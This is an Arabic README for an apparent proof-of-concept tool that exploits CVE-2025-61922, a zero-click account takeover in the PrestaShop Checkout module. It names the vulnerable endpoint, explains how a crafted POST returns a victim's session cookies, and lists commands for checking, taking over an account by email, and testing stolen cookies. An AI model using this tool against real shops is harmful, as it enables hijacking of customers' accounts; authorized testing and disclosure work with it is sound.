
برنامج نصي بسيط وتعليمي لإثبات المفهوم يوضح ثغرة الاستيلاء على الحساب بدون نقرة في وحدة الدفع بريستاشوب (CVE-2025-61922).
نص برمجي بسيط وتعليمي كدليل على المفهوم يوضح ثغرة الاستيلاء على الحسابات بدون نقرة في وحدة PrestaShop Checkout (CVE-2025-61922).
⚠️ إشعار قانوني وأخلاقي: استخدم بمسؤولية هذه الأداة مخصصة لأغراض تعليمية واختبارات أمنية مرخصة فقط. استخدمها فقط ضد الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
تؤثر هذه الثغرة، المسجلة باسم CVE-2025-61922 مع درجة CVSS 9.1 (حرجة)، على إصدارات وحدة PrestaShop Checkout الأقل من 5.0.5. تسمح لمهاجم غير مصادق بتسجيل الدخول كأي حساب عميل بمجرد معرفة عنوان البريد الإلكتروني للضحية — هجوم "بدون نقرة" حقيقي.
يرسل النص البرمجي طلب POST مصمم خصيصًا إلى نقطة النهاية الضعيفة:
/module/ps_checkout/ExpressCheckoutعند النجاح، يستجيب الخادم بملفات تعريف الارتباط الخاصة بالجلسة لحساب الضحية، والتي يمكن استخدامها لاختطاف جلستهم.
CVE-2025-61922.py - النص البرمجي الرئيسي للاستغلالREADME.md - هذه الوثائق# Check if a target is vulnerable
python CVE-2025-61922.py check --url http://target-shop.com
# Exploit a specific email
python CVE-2025-61922.py takeover --url http://target-shop.com --email [email protected]
# Test captured cookies
python CVE-2025-61922.py test --url http://target-shop.com --cookies "PrestaShop-abc123=..."